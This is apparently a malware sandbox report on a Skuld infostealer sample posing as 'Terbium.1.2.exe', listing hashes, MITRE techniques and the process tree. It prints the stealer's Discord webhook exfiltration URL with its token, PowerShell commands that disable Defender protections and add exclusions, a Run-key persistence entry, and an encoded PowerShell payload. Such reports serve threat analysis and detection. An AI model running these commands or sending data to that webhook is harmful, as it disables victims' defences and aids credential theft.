skuld | 27e10c80006f2080f85b3b9aff0d165044d1954385ea16d6e48dabaa6a1ec5af

Resubmissions

15-07-2024 03:33

240715-d4kvnawdjr 10

15-07-2024 03:33

240715-d38kbsyepg 10

15-07-2024 03:32

240715-d3zx7awcrj 10

15-07-2024 03:31

240715-d3acjawcnq 10

Analysis

max time kernel
6s
max time network
22s
platform
windows10-1703_x64
resource
win10-20240611-en
resource tags

arch:x64arch:x86image:win10-20240611-enlocale:en-usos:windows10-1703-x64system
submitted
15-07-2024 03:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Terbium.1.2.exe
Size

9.5MB
MD5

df00bc36e9b00874ff8f495a29d9f429
SHA1

3f3140a188943673e7b90b819005548042c9b675
SHA256

27e10c80006f2080f85b3b9aff0d165044d1954385ea16d6e48dabaa6a1ec5af
SHA512

c79ce66d9c73e64cc3060437bf9d2f9f3f17067b0e4ebb8b30d4863ec417ad1f95c315810168d34058f82804ca59a1d8f442d81c265e57dc330670025b152f88
SSDEEP

98304:YVMHJFAvLQWabWp2le10+9XTA8E6oMsaSk5e/UI:PFAvLCev10+9DA16oM1e/UI

Score

10^/10

skuld execution persistence privilege_escalation spyware stealer

Malware Config

Extracted

Family

skuld

https://discord.com/api/webhooks/1260739914253991956/NKvC4KymlhPTNJNmbkQtDwm5AXdtAESkrV95KgMKN5kz9Z_06X949ZzR7jGGnoW0AnBX

Signatures

Skuld stealer
An info stealer written in Go lang.
stealer skuld

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
208	powershell.exe
2740	powershell.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000\Software\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe"	Terbium.1.2.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
9	discord.com
10	discord.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	api.ipify.org
2	api.ipify.org
4	ip-api.com

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	Terbium.1.2.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	Terbium.1.2.exe

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Detects videocard installed 1 TTPs 2 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2180	wmic.exe
2368	wmic.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	5	Go-http-client/1.1

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	Terbium.1.2.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	Terbium.1.2.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	Terbium.1.2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	Terbium.1.2.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f53000000010000007f000000307d3020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c009000000010000003e000000303c06082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030906082b0601050507030106082b060105050703080b0000000100000030000000440069006700690043006500720074002000420061006c00740069006d006f0072006500200052006f006f007400000062000000010000002000000016af57a9f676b0ab126095aa5ebadef22ab31119d644ac95cd4b93dbf3f26aeb140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c7f000000010000000c000000300a06082b060105050703097e000000010000000800000000c001b39667d601030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	Terbium.1.2.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae4747e000000010000000800000000c001b39667d6017f000000010000000c000000300a06082b060105050703091d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df062000000010000002000000016af57a9f676b0ab126095aa5ebadef22ab31119d644ac95cd4b93dbf3f26aeb0b0000000100000030000000440069006700690043006500720074002000420061006c00740069006d006f0072006500200052006f006f007400000009000000010000003e000000303c06082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030906082b0601050507030106082b0601050507030853000000010000007f000000307d3020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	Terbium.1.2.exe

Suspicious behavior: EnumeratesProcesses 61 IoCs

pid	Process
2008	Terbium.1.2.exe
2008	Terbium.1.2.exe
2008	Terbium.1.2.exe
2008	Terbium.1.2.exe
2008	Terbium.1.2.exe
2008	Terbium.1.2.exe
2008	Terbium.1.2.exe
2008	Terbium.1.2.exe
2740	powershell.exe
2740	powershell.exe
2740	powershell.exe
2008	Terbium.1.2.exe
2008	Terbium.1.2.exe
2008	Terbium.1.2.exe
2008	Terbium.1.2.exe
2008	Terbium.1.2.exe
2008	Terbium.1.2.exe
2008	Terbium.1.2.exe
2008	Terbium.1.2.exe
2008	Terbium.1.2.exe
2008	Terbium.1.2.exe
2008	Terbium.1.2.exe
2008	Terbium.1.2.exe
2008	Terbium.1.2.exe
2008	Terbium.1.2.exe
2008	Terbium.1.2.exe
2008	Terbium.1.2.exe
2008	Terbium.1.2.exe
2008	Terbium.1.2.exe
2008	Terbium.1.2.exe
2008	Terbium.1.2.exe
2008	Terbium.1.2.exe
2008	Terbium.1.2.exe
2008	Terbium.1.2.exe
2008	Terbium.1.2.exe
2008	Terbium.1.2.exe
2008	Terbium.1.2.exe
2008	Terbium.1.2.exe
2008	Terbium.1.2.exe
2008	Terbium.1.2.exe
2008	Terbium.1.2.exe
2008	Terbium.1.2.exe
2008	Terbium.1.2.exe
2008	Terbium.1.2.exe
2008	Terbium.1.2.exe
2008	Terbium.1.2.exe
2008	Terbium.1.2.exe
2228	powershell.exe
2228	powershell.exe
2008	Terbium.1.2.exe
2008	Terbium.1.2.exe
208	powershell.exe
2008	Terbium.1.2.exe
2008	Terbium.1.2.exe
2228	powershell.exe
2008	Terbium.1.2.exe
2008	Terbium.1.2.exe
208	powershell.exe
2008	Terbium.1.2.exe
2008	Terbium.1.2.exe
208	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2008	Terbium.1.2.exe
Token: SeIncreaseQuotaPrivilege	3516	wmic.exe
Token: SeSecurityPrivilege	3516	wmic.exe
Token: SeTakeOwnershipPrivilege	3516	wmic.exe
Token: SeLoadDriverPrivilege	3516	wmic.exe
Token: SeSystemProfilePrivilege	3516	wmic.exe
Token: SeSystemtimePrivilege	3516	wmic.exe
Token: SeProfSingleProcessPrivilege	3516	wmic.exe
Token: SeIncBasePriorityPrivilege	3516	wmic.exe
Token: SeCreatePagefilePrivilege	3516	wmic.exe
Token: SeBackupPrivilege	3516	wmic.exe
Token: SeRestorePrivilege	3516	wmic.exe
Token: SeShutdownPrivilege	3516	wmic.exe
Token: SeDebugPrivilege	3516	wmic.exe
Token: SeSystemEnvironmentPrivilege	3516	wmic.exe
Token: SeRemoteShutdownPrivilege	3516	wmic.exe
Token: SeUndockPrivilege	3516	wmic.exe
Token: SeManageVolumePrivilege	3516	wmic.exe
Token: 33	3516	wmic.exe
Token: 34	3516	wmic.exe
Token: 35	3516	wmic.exe
Token: 36	3516	wmic.exe
Token: SeIncreaseQuotaPrivilege	3516	wmic.exe
Token: SeSecurityPrivilege	3516	wmic.exe
Token: SeTakeOwnershipPrivilege	3516	wmic.exe
Token: SeLoadDriverPrivilege	3516	wmic.exe
Token: SeSystemProfilePrivilege	3516	wmic.exe
Token: SeSystemtimePrivilege	3516	wmic.exe
Token: SeProfSingleProcessPrivilege	3516	wmic.exe
Token: SeIncBasePriorityPrivilege	3516	wmic.exe
Token: SeCreatePagefilePrivilege	3516	wmic.exe
Token: SeBackupPrivilege	3516	wmic.exe
Token: SeRestorePrivilege	3516	wmic.exe
Token: SeShutdownPrivilege	3516	wmic.exe
Token: SeDebugPrivilege	3516	wmic.exe
Token: SeSystemEnvironmentPrivilege	3516	wmic.exe
Token: SeRemoteShutdownPrivilege	3516	wmic.exe
Token: SeUndockPrivilege	3516	wmic.exe
Token: SeManageVolumePrivilege	3516	wmic.exe
Token: 33	3516	wmic.exe
Token: 34	3516	wmic.exe
Token: 35	3516	wmic.exe
Token: 36	3516	wmic.exe
Token: SeIncreaseQuotaPrivilege	2180	wmic.exe
Token: SeSecurityPrivilege	2180	wmic.exe
Token: SeTakeOwnershipPrivilege	2180	wmic.exe
Token: SeLoadDriverPrivilege	2180	wmic.exe
Token: SeSystemProfilePrivilege	2180	wmic.exe
Token: SeSystemtimePrivilege	2180	wmic.exe
Token: SeProfSingleProcessPrivilege	2180	wmic.exe
Token: SeIncBasePriorityPrivilege	2180	wmic.exe
Token: SeCreatePagefilePrivilege	2180	wmic.exe
Token: SeBackupPrivilege	2180	wmic.exe
Token: SeRestorePrivilege	2180	wmic.exe
Token: SeShutdownPrivilege	2180	wmic.exe
Token: SeDebugPrivilege	2180	wmic.exe
Token: SeSystemEnvironmentPrivilege	2180	wmic.exe
Token: SeRemoteShutdownPrivilege	2180	wmic.exe
Token: SeUndockPrivilege	2180	wmic.exe
Token: SeManageVolumePrivilege	2180	wmic.exe
Token: 33	2180	wmic.exe
Token: 34	2180	wmic.exe
Token: 35	2180	wmic.exe
Token: 36	2180	wmic.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 2008 wrote to memory of 4460	2008	Terbium.1.2.exe	71
PID 2008 wrote to memory of 4460	2008	Terbium.1.2.exe	71
PID 2008 wrote to memory of 3992	2008	Terbium.1.2.exe	72
PID 2008 wrote to memory of 3992	2008	Terbium.1.2.exe	72
PID 2008 wrote to memory of 3516	2008	Terbium.1.2.exe	73
PID 2008 wrote to memory of 3516	2008	Terbium.1.2.exe	73
PID 2008 wrote to memory of 2180	2008	Terbium.1.2.exe	75
PID 2008 wrote to memory of 2180	2008	Terbium.1.2.exe	75
PID 2008 wrote to memory of 2740	2008	Terbium.1.2.exe	76
PID 2008 wrote to memory of 2740	2008	Terbium.1.2.exe	76
PID 2008 wrote to memory of 4764	2008	Terbium.1.2.exe	77
PID 2008 wrote to memory of 4764	2008	Terbium.1.2.exe	77
PID 2008 wrote to memory of 4388	2008	Terbium.1.2.exe	78
PID 2008 wrote to memory of 4388	2008	Terbium.1.2.exe	78
PID 2008 wrote to memory of 2368	2008	Terbium.1.2.exe	79
PID 2008 wrote to memory of 2368	2008	Terbium.1.2.exe	79
PID 2008 wrote to memory of 3044	2008	Terbium.1.2.exe	81
PID 2008 wrote to memory of 3044	2008	Terbium.1.2.exe	81
PID 2008 wrote to memory of 4684	2008	Terbium.1.2.exe	82
PID 2008 wrote to memory of 4684	2008	Terbium.1.2.exe	82
PID 2008 wrote to memory of 2228	2008	Terbium.1.2.exe	83
PID 2008 wrote to memory of 2228	2008	Terbium.1.2.exe	83
PID 2008 wrote to memory of 208	2008	Terbium.1.2.exe	84
PID 2008 wrote to memory of 208	2008	Terbium.1.2.exe	84

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4460	attrib.exe
3992	attrib.exe
2680	attrib.exe
2272	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Terbium.1.2.exe
"C:\Users\Admin\AppData\Local\Temp\Terbium.1.2.exe"
1⤵
- Adds Run key to start application
- Maps connected drives based on registry
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2008
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\AppData\Local\Temp\Terbium.1.2.exe
  2⤵
  - Views/modifies file attributes
  PID:4460
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
  2⤵
  - Views/modifies file attributes
  PID:3992
- C:\Windows\System32\Wbem\wmic.exe
  wmic csproduct get UUID
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3516
- C:\Windows\System32\Wbem\wmic.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  - Suspicious use of AdjustPrivilegeToken
  PID:2180
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\Terbium.1.2.exe
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2740
- C:\Windows\System32\Wbem\wmic.exe
  wmic os get Caption
  2⤵
  PID:4764
- C:\Windows\System32\Wbem\wmic.exe
  wmic cpu get Name
  2⤵
  PID:4388
- C:\Windows\System32\Wbem\wmic.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:2368
- C:\Windows\System32\Wbem\wmic.exe
  wmic csproduct get UUID
  2⤵
  PID:3044
- C:\Windows\system32\netsh.exe
  netsh wlan show profiles
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:4684
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2228
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZ